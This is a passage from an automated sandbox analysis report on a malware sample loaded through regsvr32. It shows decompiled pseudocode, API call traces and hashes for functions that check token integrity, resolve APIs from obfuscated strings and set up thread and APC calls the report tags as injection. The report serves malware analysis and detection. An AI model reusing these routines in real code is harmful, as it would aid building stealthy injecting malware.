									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E031F2C11(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                0x031f5b56
                0x031f5b5d
                0x031f5b64
                0x031f5b78
                0x031f5b83
                0x031f5b9b
                0x031f5ba8
                0x031f5bab
                0x031f5bb0
                0x031f5bbb
                0x031f5bbf
                0x031f5bce
                0x031f5bd2
                0x031f5bee
                0x031f5bee
                0x031f5bf2
                0x031f5bf2
                0x031f5bf7
                0x031f5bfb
                0x031f5c01
                0x031f5c02
                0x031f5c09
                0x031f5c0f

                APIs
                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 031F5B7B
                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 031F5B9B
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 031F5BAB
                • CloseHandle.KERNEL32(00000000), ref: 031F5BFB
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 031F5BCE
                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 031F5BD6
                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 031F5BE6
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                • String ID:
                • API String ID: 1295030180-0
                • Opcode ID: 3f910840d94175231f94ade1e914a92b6136dae852614303d752a3142b323a5c
                • Instruction ID: f4bcc6b6ea36c0f4d6e1d92536403c703c29857adaf50daf0b51941657e94b61
                • Opcode Fuzzy Hash: 3f910840d94175231f94ade1e914a92b6136dae852614303d752a3142b323a5c
                • Instruction Fuzzy Hash: 91213975900209FFEB00EF94DC84EEEBBBDEF09304F1440A5EA11A6250C7759A55EF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F52C4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                Download Yara Rule
                C-Code - Quality: 64%
                			E031F52C4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x31fa2d8; // 0x240d5a8
				_t1 = _t9 + 0x31fb62c; // 0x253d7325
				_t36 = 0;
				_t28 = E031F3CE5(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t40 = E031F2114(_v8 +  *_t39(_a4) + 1);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E031F1628(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E031F2C11(_t40);
						_t42 = E031F73CA(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E031F2C11(_t36);
							_t36 = _t42;
						}
						_t43 = E031F2A4E(_t36, _t33);
						if(_t43 != 0) {
							E031F2C11(_t36);
							_t36 = _t43;
						}
					}
					E031F2C11(_t28);
				}
				return _t36;
			}
















                0x031f52c4
                0x031f52c7
                0x031f52c8
                0x031f52cf
                0x031f52d6
                0x031f52dd
                0x031f52e1
                0x031f52e8
                0x031f52ef
                0x031f52f4
                0x031f5306
                0x031f530a
                0x031f530e
                0x031f5314
                0x031f5319
                0x031f5323
                0x031f5329
                0x031f532b
                0x031f5342
                0x031f5346
                0x031f5349
                0x031f534e
                0x031f534e
                0x031f5357
                0x031f535b
                0x031f535e
                0x031f5363
                0x031f5363
                0x031f535b
                0x031f5366
                0x031f536b
                0x031f5371

                APIs
                  • Part of subcall function 031F3CE5: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,031F52DD,253D7325,00000000,7691C740,?,?,031F7675,?,056095B0), ref: 031F3D4C
                  • Part of subcall function 031F3CE5: sprintf.NTDLL ref: 031F3D6D
                • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,031F7675,?,056095B0), ref: 031F52EF
                • lstrlen.KERNEL32(?,?,?,031F7675,?,056095B0), ref: 031F52F7
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • strcpy.NTDLL ref: 031F530E
                • lstrcat.KERNEL32(00000000,?), ref: 031F5319
                  • Part of subcall function 031F1628: lstrlen.KERNEL32(?,?,?,00000000,?,031F5328,00000000,?,?,?,031F7675,?,056095B0), ref: 031F1639
                  • Part of subcall function 031F2C11: RtlFreeHeap.NTDLL(00000000,00000000,031F7013,00000000,?,?,00000000), ref: 031F2C1D
                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,031F7675,?,056095B0), ref: 031F5336
                  • Part of subcall function 031F73CA: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,031F5342,00000000,?,?,031F7675,?,056095B0), ref: 031F73D4
                  • Part of subcall function 031F73CA: _snprintf.NTDLL ref: 031F7432
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                • String ID: =
                • API String ID: 2864389247-1428090586
                • Opcode ID: f1cfe8f518ec16c229b285c5935e6c4d9690a984107c02213171ecc80baa1e76
                • Instruction ID: 4a0a6762e1e274a8766306e910c0ceabe135340074639e4c87f49e6aecabb587
                • Opcode Fuzzy Hash: f1cfe8f518ec16c229b285c5935e6c4d9690a984107c02213171ecc80baa1e76
                • Instruction Fuzzy Hash: 3811A37B5016257F8B12FB689C84C6E369D9E8DA607194415FB04EB101DFB9C94257B0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD4B65 Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 04BD4B88
                  • Part of subcall function 04BCAEC5: GetModuleHandleA.KERNEL32(?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAEE6
                  • Part of subcall function 04BCAEC5: GetProcAddress.KERNEL32(00000000,?), ref: 04BCAEFF
                  • Part of subcall function 04BCAEC5: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAF1C
                  • Part of subcall function 04BCAEC5: IsWow64Process.KERNEL32(?,?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAF2D
                  • Part of subcall function 04BCAEC5: CloseHandle.KERNEL32(?,?,?,?,04BC1DC6,00000000), ref: 04BCAF40
                • ResumeThread.KERNEL32(00000004,?,00000000,00000000,00000004,?,00000000,00000000,74E04EE0,00000000), ref: 04BD4C42
                • WaitForSingleObject.KERNEL32(00000064), ref: 04BD4C50
                • SuspendThread.KERNEL32(00000004), ref: 04BD4C63
                  • Part of subcall function 04BCA7FE: memset.NTDLL ref: 04BCAABF
                • ResumeThread.KERNELBASE(00000004), ref: 04BD4CE6
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Thread$HandleProcessResumememset$AddressCloseModuleObjectOpenProcSingleSuspendWaitWow64
                • String ID:
                • API String ID: 223543837-0
                • Opcode ID: 80069918977b2885a5585570871b25414702490526d7a1386f938f1a63481a66
                • Instruction ID: a792bb9530c6015d7c4149a71c6cd6e991f6de334465040901a02706a0d5bccb
                • Opcode Fuzzy Hash: 80069918977b2885a5585570871b25414702490526d7a1386f938f1a63481a66
                • Instruction Fuzzy Hash: 8D418F71900249EFEF21AF65CC84AAE7BB9FF44304F0845EAE91997150E735EE50CB20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F2D2F Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 031F63FF: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,056089D4,031F2D5F,?,?,?,?,?,?,?,?,?,?,?,031F2D5F), ref: 031F64CB
                  • Part of subcall function 031F3318: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 031F3355
                  • Part of subcall function 031F3318: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 031F3386
                • SysAllocString.OLEAUT32(00000000), ref: 031F2D8B
                • SysAllocString.OLEAUT32(0070006F), ref: 031F2D9F
                • SysAllocString.OLEAUT32(00000000), ref: 031F2DB1
                • SysFreeString.OLEAUT32(00000000), ref: 031F2E15
                • SysFreeString.OLEAUT32(00000000), ref: 031F2E24
                • SysFreeString.OLEAUT32(00000000), ref: 031F2E2F
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                • String ID:
                • API String ID: 2831207796-0
                • Opcode ID: 3fc9d38ec5c62d3b2662db9bca600755343f240fec00cf9841ba9e34c7f5cfb0
                • Instruction ID: c6dce3366ed7ed39aa64eddb073cfc1371c0442acb1d82b7ab52bc128babc37b
                • Opcode Fuzzy Hash: 3fc9d38ec5c62d3b2662db9bca600755343f240fec00cf9841ba9e34c7f5cfb0
                • Instruction Fuzzy Hash: A4314036D00609AFDB01EFA8C84469FB7BAEF4D305F144425EE11EB211DB759916CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC6D4C Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,?,?,04BED514,?,04BEA590,00000018,04BCB772,00000000,00000002,04BED518,00000003,04BED514,00000000,016595A8), ref: 04BC6D8F
                • VirtualProtect.KERNELBASE(00000000,00000004,?,?,00000000,00000004,?,00000000,?,?,?,04BED514,?,04BEA590,00000018,04BCB772), ref: 04BC6E1A
                • RtlEnterCriticalSection.NTDLL(04BEE480), ref: 04BC6E42
                • RtlLeaveCriticalSection.NTDLL(04BEE480), ref: 04BC6E60
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                • String ID:
                • API String ID: 3666628472-0
                • Opcode ID: 825c7d2a5bc4a6695982eb537f99d35ba26377f59bf47d557d87bab2c3c81ba3
                • Instruction ID: c8dfe8196fa8566c2f5cafd089f1b2c155d5660b2d45217eab8924135a917037
                • Opcode Fuzzy Hash: 825c7d2a5bc4a6695982eb537f99d35ba26377f59bf47d557d87bab2c3c81ba3
                • Instruction Fuzzy Hash: 92413E71A00616EFDB11DF65C8849AEBBF5FF88300B10859AE915EB250D774FA41CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC87CD Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,04BCA90D,?,?,?,00000000,00000000), ref: 04BC87F2
                • GetProcAddress.KERNEL32(00000000,?), ref: 04BC8814
                • GetProcAddress.KERNEL32(00000000,?), ref: 04BC882A
                • GetProcAddress.KERNEL32(00000000,?), ref: 04BC8840
                • GetProcAddress.KERNEL32(00000000,?), ref: 04BC8856
                • GetProcAddress.KERNEL32(00000000,?), ref: 04BC886C
                  • Part of subcall function 04BDBEBC: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 04BDBF19
                  • Part of subcall function 04BDBEBC: memset.NTDLL ref: 04BDBF3D
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                • String ID:
                • API String ID: 3012371009-0
                • Opcode ID: 8b71b0f4ad97298564d2bef56d3da9fca1d4ab12b37f212ff6e67d54b2fa15a1
                • Instruction ID: a32219ad70bdbba06b7e8f36689b982ce9f3fca33e9e69bccb1a4f337f2ab47e
                • Opcode Fuzzy Hash: 8b71b0f4ad97298564d2bef56d3da9fca1d4ab12b37f212ff6e67d54b2fa15a1
                • Instruction Fuzzy Hash: 352132B1A0120BDFD710EF69CD84E5677ECEB44385B0585AAE519CB601E738F9058F71
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F21FA Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E031F21FA(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E031F2114(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x31fa2d8; // 0x240d5a8
					_t1 = _t23 + 0x31fb11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x31fa2d8; // 0x240d5a8
					_t2 = _t26 + 0x31fb782; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E031F2C11(_t54);
					} else {
						_t30 =  *0x31fa2d8; // 0x240d5a8
						_t5 = _t30 + 0x31fb76f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x31fa2d8; // 0x240d5a8
							_t7 = _t33 + 0x31fb4ce; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x31fa2d8; // 0x240d5a8
								_t9 = _t36 + 0x31fb406; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x31fa2d8; // 0x240d5a8
									_t11 = _t39 + 0x31fb792; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E031F2F8D(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                0x031f2209
                0x031f220d
                0x031f22cf
                0x031f2213
                0x031f2213
                0x031f2218
                0x031f222b
                0x031f222d
                0x031f2232
                0x031f223a
                0x031f2241
                0x031f2245
                0x031f2248
                0x031f22c7
                0x031f22c8
                0x031f224a
                0x031f224a
                0x031f224f
                0x031f2257
                0x031f225b
                0x031f225e
                0x00000000
                0x031f2260
                0x031f2260
                0x031f2265
                0x031f226d
                0x031f2271
                0x031f2274
                0x00000000
                0x031f2276
                0x031f2276
                0x031f227b
                0x031f2283
                0x031f2287
                0x031f228a
                0x00000000
                0x031f228c
                0x031f228c
                0x031f2291
                0x031f2299
                0x031f229d
                0x031f22a0
                0x00000000
                0x031f22a2
                0x031f22a8
                0x031f22ad
                0x031f22b4
                0x031f22bb
                0x031f22be
                0x00000000
                0x031f22c0
                0x031f22c3
                0x031f22c3
                0x031f22be
                0x031f22a0
                0x031f228a
                0x031f2274
                0x031f225e
                0x031f2248
                0x031f22dd

                APIs
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,031F122E,?,?,?,?,00000000,00000000), ref: 031F221F
                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 031F2241
                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 031F2257
                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 031F226D
                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 031F2283
                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 031F2299
                  • Part of subcall function 031F2F8D: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,031F22B9), ref: 031F2FEA
                  • Part of subcall function 031F2F8D: memset.NTDLL ref: 031F300C
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                • String ID:
                • API String ID: 3012371009-0
                • Opcode ID: 524adef5e0231c666bf45c7c6a80c9a19c2568c1c3fd2bd024fa517769f6eb5e
                • Instruction ID: ed0dcbd9b466c61212b83cc2521882dca27b5df4d1afd9a2433ed914ee57f8a1
                • Opcode Fuzzy Hash: 524adef5e0231c666bf45c7c6a80c9a19c2568c1c3fd2bd024fa517769f6eb5e
                • Instruction Fuzzy Hash: B4219FB560060AAFD754EFA8C844E5A7BFCFF0C654B048A25EA09C7211E334E946CF70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD9DC6 Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                Download Yara Rule
                APIs
                • CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,04BD2BEA), ref: 04BD9DDD
                • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 04BD9DF2
                • GetLastError.KERNEL32(00000000), ref: 04BD9DFD
                • TerminateThread.KERNEL32(00000000,00000000), ref: 04BD9E07
                • CloseHandle.KERNEL32(00000000), ref: 04BD9E0E
                • SetLastError.KERNEL32(00000000), ref: 04BD9E17
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                • String ID:
                • API String ID: 3832013932-0
                • Opcode ID: 42231f8793748a2c491b29f1ade2efbc42a9a719e452128ef615af3091308050
                • Instruction ID: fc6716010b9db6f7992f040ff40f3fd5e36cee448f7be687fbabdb5641fb525c
                • Opcode Fuzzy Hash: 42231f8793748a2c491b29f1ade2efbc42a9a719e452128ef615af3091308050
                • Instruction Fuzzy Hash: 5AF01232105A21EBD7212FA2AD08F5BBB69FF8C751F04480EF6059B151D73A9D209BB6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F1B78 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                Download Yara Rule
                C-Code - Quality: 88%
                			E031F1B78(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x31fa39c);
					_t91 = 0x80000002;
					L6:
					_t59 = E031F23CC( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E031F77FE(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E031F2C11(_a8);
						goto L29;
					}
					_t64 =  *0x31fa2d0; // 0x5609b30
					_t16 = _t64 + 0xc; // 0x5609bfe
					_t65 = E031F23CC(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d031f90, executed
						_t67 = E031F5173(_t97,  *_t33, _t91, _a8,  *0x31fa394,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x31fa2d8; // 0x240d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x31fba48; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x31fba43; // 0x55434b48
								_t69 = _t34;
							}
							if(E031F3964(_t69,  *0x31fa394,  *0x31fa398,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x31fa2d8; // 0x240d5a8
									_t44 = _t71 + 0x31fb83e; // 0x74666f53
									_t73 = E031F23CC(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d031f90
										E031F2BC9( *_t47, _t91, _a8,  *0x31fa398, _a24);
										_t49 = _t101 + 0x10; // 0x3d031f90
										E031F2BC9( *_t49, _t91, _t99,  *0x31fa390, _a16);
										E031F2C11(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d031f90, executed
									E031F2BC9( *_t40, _t91, _a8,  *0x31fa398, _a24); // executed
									_t43 = _t101 + 0x10; // 0x3d031f90
									E031F2BC9( *_t43, _t91, _a8,  *0x31fa390, _a16);
								}
								if( *_t101 != 0) {
									E031F2C11(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d031f90, executed
					_t81 = E031F55E9( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d031f90
							E031F5173(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E031F2C11(_t100);
						_t98 = _a16;
					}
					E031F2C11(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E031F7A9C(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x31fa39c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

























                0x031f1b78
                0x031f1b81
                0x031f1b88
                0x031f1b8d
                0x031f1bfa
                0x031f1c00
                0x031f1c05
                0x031f1c0c
                0x031f1c13
                0x031f1c16
                0x031f1d81
                0x031f1d88
                0x031f1d88
                0x031f1d8d
                0x031f1d8f
                0x031f1d8f
                0x031f1d98
                0x031f1d98
                0x031f1c1c
                0x031f1c21
                0x031f1c28
                0x031f1d77
                0x031f1d7a
                0x00000000
                0x031f1d7a
                0x031f1c2e
                0x031f1c33
                0x031f1c36
                0x031f1c3d
                0x031f1c40
                0x031f1c89
                0x031f1c89
                0x031f1c9c
                0x031f1c9f
                0x031f1ca6
                0x031f1cae
                0x031f1cb3
                0x031f1cbd
                0x031f1cbd
                0x031f1cb5
                0x031f1cb5
                0x031f1cb5
                0x031f1cb5
                0x031f1cdf
                0x031f1ce7
                0x031f1d15
                0x031f1d1a
                0x031f1d21
                0x031f1d26
                0x031f1d2a
                0x031f1d5c
                0x031f1d2c
                0x031f1d39
                0x031f1d3c
                0x031f1d4c
                0x031f1d4f
                0x031f1d55
                0x031f1d55
                0x031f1ce9
                0x031f1cf6
                0x031f1cf9
                0x031f1d0b
                0x031f1d0e
                0x031f1d0e
                0x031f1d66
                0x031f1d72
                0x031f1d68
                0x031f1d6b
                0x031f1d6b
                0x031f1d66
                0x031f1cdf
                0x00000000
                0x031f1ca6
                0x031f1c4f
                0x031f1c52
                0x031f1c59
                0x031f1c5f
                0x031f1c62
                0x031f1c64
                0x031f1c70
                0x031f1c73
                0x031f1c73
                0x031f1c79
                0x031f1c7e
                0x031f1c7e
                0x031f1c84
                0x00000000
                0x031f1c84
                0x031f1b92
                0x00000000
                0x031f1bb9
                0x031f1bb9
                0x031f1bc5
                0x031f1bd8
                0x031f1bde
                0x031f1be6
                0x00000000
                0x031f1be6

                APIs
                • StrChrA.SHLWAPI(031F61AC,0000005F,00000000,00000000,00000104), ref: 031F1BAB
                • lstrcpy.KERNEL32(?,?), ref: 031F1BD8
                  • Part of subcall function 031F23CC: lstrlen.KERNEL32(?,00000000,05609B30,00000000,031F3413,05609D0E,69B25F44,?,?,?,?,69B25F44,00000005,031FA010,4D283A53,?), ref: 031F23D3
                  • Part of subcall function 031F23CC: mbstowcs.NTDLL ref: 031F23FC
                  • Part of subcall function 031F23CC: memset.NTDLL ref: 031F240E
                  • Part of subcall function 031F2BC9: lstrlenW.KERNEL32(?,?,?,031F1D41,3D031F90,80000002,031F61AC,031F19CD,74666F53,4D4C4B48,031F19CD,?,3D031F90,80000002,031F61AC,?), ref: 031F2BEE
                  • Part of subcall function 031F2C11: RtlFreeHeap.NTDLL(00000000,00000000,031F7013,00000000,?,?,00000000), ref: 031F2C1D
                • lstrcpy.KERNEL32(?,00000000), ref: 031F1BFA
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                • String ID: ($\
                • API String ID: 3924217599-1512714803
